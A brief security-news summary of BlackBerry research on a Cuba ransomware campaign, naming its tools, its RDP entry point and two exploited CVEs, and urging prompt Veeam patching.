Security researchers at BlackBerry analyzed an operation carried out by the Cuba ransomware group in June. The operation reached its peak when the group targeted a U.S. critical infrastructure entity, alongside launching attacks on an IT integrator in Latin America.
Diving into details
The Cuba ransomware group, suspected to have ties to Russia, employed a series of malicious tools that shared similarities with its previous endeavors.
- The attackers leveraged a credentials reuse scheme. The initial sign of compromise was a successful admin login via RDP.
- Cuba's toolkit comprises an array of custom and pre-existing components. Among these tools are BUGHATCH (personalized downloader), BURNTCIGAR (anti-malware remover), and Metasploit and Cobalt Strike frameworks.
- Additionally, the toolkit incorporates numerous Living-off-the-Land Binaries (LOLBINS), which could be used for malware delivery, performing file operations (such as downloading and uplaoding), or stealing passwords.
Use of exploits
The campaign deployed two exploits: one targeting Microsoft's NetLogon protocol (MS-NRPC), (CVE-2020-1472), that enables privilege escalation against active directory domain controllers by creating a vulnerable connection through MS-NRPC to gain administrative access; another is a novel tool targeting the a bug (CVE-2023-27532) in Veeam Backup & Replication software, potentially granting attackers access to stored credentials within the configuration file on the victim's device.
The bottom line
Cuba ransomware continues to pose an ongoing threat, since it first reared its head in 2019. The addition of CVE-2023-27532 to the list of vulnerabilities targeted by Cuba underscores the urgent need for the swift installation of security updates for Veeam software. This situation serves as a reminder of the substantial risks associated with postponing updates, especially when PoC exploits are readily accessible.
Publisher
/https://cyware-ent.s3.amazonaws.com/image_bank/a5fb_shutterstock_1718407564.jpg)
/https://cyware-ent.s3.amazonaws.com/image_bank/f499_Shutterstock_1133471762.jpg)
